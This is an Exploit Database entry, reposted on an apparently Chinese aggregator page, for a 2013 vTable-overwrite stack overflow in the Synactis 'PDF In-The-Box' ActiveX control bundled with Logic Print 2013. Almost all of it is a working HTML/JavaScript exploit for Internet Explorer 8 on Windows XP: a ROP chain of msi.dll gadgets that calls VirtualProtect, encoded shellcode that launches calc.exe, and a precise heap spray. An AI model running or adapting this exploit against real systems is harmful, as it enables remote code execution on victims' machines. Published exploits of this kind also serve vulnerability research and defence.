Logic Print 2013 – vTable Overwrite Stack Overflow

• Exploit Database
• 106 阅读

• 作者： h1ch4m
  日期： 2013-05-30
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/25835/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162

  <!-- Exploit Title: Logic Print 2013 stack overflow (vTable overwrite) Software Link: http://www.logic-print.com/ Tested on: Win XP SP3 French + Internet Explorer 8 Date: 29/05/2013 Author: h1ch4m (Hicham Oumounid) Email: h1ch4m@live.fr Twitter: @o_h1ch4m   Thanks to corelanc0d3r for: "DEPS" - Precise heap spray for FF/IE8/IE9/IE10   Well, the bug isn&apos;t in the app itself, but in a third party dll "PDF In-The-Box" from http://www.synactis.com Logic Print 2013 uses an old version of the dll, new ones aren&apos;t affected, the ROP is from an os dll: [msi.dll] (C:\WINDOWS\system32\msi.dll) 3.1.4001.5512   --> <html> <head> <OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="xploit"></OBJECT> </head> <body OnLoad="xploit();"> <div id="blah"></div> <script language="javascript"> var rop = ""; var shellcode = ""; var junk1 = &apos;&apos;; var junk2 = &apos;&apos;; function theMagicalMysteryTour() { rop = unescape("%u2230%u2030" + ///////////////////////////////////////////// ///STACK PIVOT/// ///////////////////////////////////////////// "%u370d%u7d20" +// 0x7d20370d : # XCHG EAX,ESP # ADD DWORD PTR DS:[EAX],EAX # MOV EAX,EDI # POP EDI # POP ESI # POP EBP # RETN 0x04** [msi.dll] ** |ascii "%u4141%u4141" + "%u0116%u7d2e" +// 0x7d2e0116 :# RETN** [msi.dll] ** |ascii "%u4141%u4141" + ///////////////////////////////////////////// /// ECX = lpOldProtect (ptr to W address) /// ///////////////////////////////////////////// "%u1815%u7d21" +// 0x7d211815 :# POP ECX # RETN [msi.dll] "%u4070%u7D3B" +// 0x7D3B4070 :# &Writable location [msi.dll] ///////////////////////////////////////////// ///EDX = NewProtect (0x40)/// ///////////////////////////////////////////// "%u9c86%u7d27" +// 0x7d279c86 :# POP EAX # RETN** [msi.dll] "%uFFC0%uFFFF" +// 0xFFFFFFBF "%u66d7%u7d2e" +// 0x7d2e66d7 :# NEG EAX # RETN 0x04** [msi.dll] "%u23dc%u7d20" +// 0x7d2023dc :# XCHG EAX,EDX # RETN** [msi.dll] "%u4141%u4141" + ///////////////////////////////////////////// /// EBX = dwSize/// ///////////////////////////////////////////// "%u9c86%u7d27" +// 0x7d279c86 :# POP EAX # RETN** [msi.dll] "%uFAFF%uFFFF" +// 0xFFFFFAFF "%u66d7%u7d2e" +// 0x7d2e66d7 :# NEG EAX # RETN 0x04** [msi.dll] "%u29ac%u7d24" +// 0x7d2429ac :# XCHG EAX,EBX # OR EAX,14C48300 # POP EBP # RETN 0x08** [msi.dll] "%u4141%u4141" + "%u4141%u4141" + "%u0116%u7d2e" +// 0x7d2e0116 :# RETN** [msi.dll] ** |ascii "%u4141%u4141" + "%u4141%u4141" + ///////////////////////////////////////////// /// ESI = ptr to VirtualProtect() /// /// EBP = ReturnTo (ptr to jmp esp) /// ///////////////////////////////////////////// "%u9c86%u7d27" +// 0x7d279c86 :# POP EAX # RETN** [msi.dll] "%u1318%u6358" +// 0x63581318 :# ptr to VirtualProtect() [mshtml.dll] "%uf84a%u7d3a" +// 0x7d3af84a :# MOV EAX,DWORD PTR DS:[EAX] # RETN** [msi.dll] "%u0622%u7d36" +// 0x7d360622 :# PUSH EAX # POP ESI # POP EBP # RETN 0x04** [msi.dll] "%ub275%u7d24" +// 0x7d24b275 :# jmp esp ///////////////////////////////////////////// /// EDI = ROP NOP (RETN)/// ///////////////////////////////////////////// "%u2669%u7d20" +// 0x7d202669 :# POP EDI # RETN** [msi.dll] "%u4141%u4141" + "%u0116%u7d2e" +// 0x7d2e0116 :# RETN** [msi.dll] ** |ascii ///////////////////////////////////////////// /// EAX = NOP (0x90909090)/// ///////////////////////////////////////////// "%u9c86%u7d27" +// 0x7d279c86 :# POP EAX # RETN** [msi.dll] "%u9090%u9090" + ///////////////////////////////////////////// /// PUSH IT & GET IT/// ///////////////////////////////////////////// "%uc08e%u7d27" +// 0x7d27c08e :# PUSHAD # RETN** [msi.dll] ""); // win32_exec -EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); } function DEPS() { var div_container = document.getElementById("blah"); div_container.style.cssText = "display:none"; var data; offset = 0x104; junk = unescape("%u2020%u2020"); while (junk.length < 0x1000) junk += junk; data = junk.substring(0,offset) + rop + shellcode data += junk.substring(0,0x800-offset-rop.length-shellcode.length);   while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); div_container.appendChild(obj); } } function xploit() { theMagicalMysteryTour(); DEPS(); // MOV EAX,DWORD PTR SS:[EBP-10];the stack is overflowed, ebp-10 is put in eax then >>>>|| // MOV ECX,DWORD PTR DS:[EAX];|| // CALL DWORD PTR DS:[ECX-4]; BOOOOOOOOOOOM <<<<|| EAX = "\x28\x22\x30\x20";// 0x20302228heap adress " Corelan "DEPS" - Precise heap spray " while (junk1.length < 189) junk1 += "\x41"; while (junk2.length < 7000) junk2 += "\x41"; var xploit = document.getElementById("xploit"); xploit.ConnectToSynactis(junk1+EAX+junk2); } </script> </body> </html>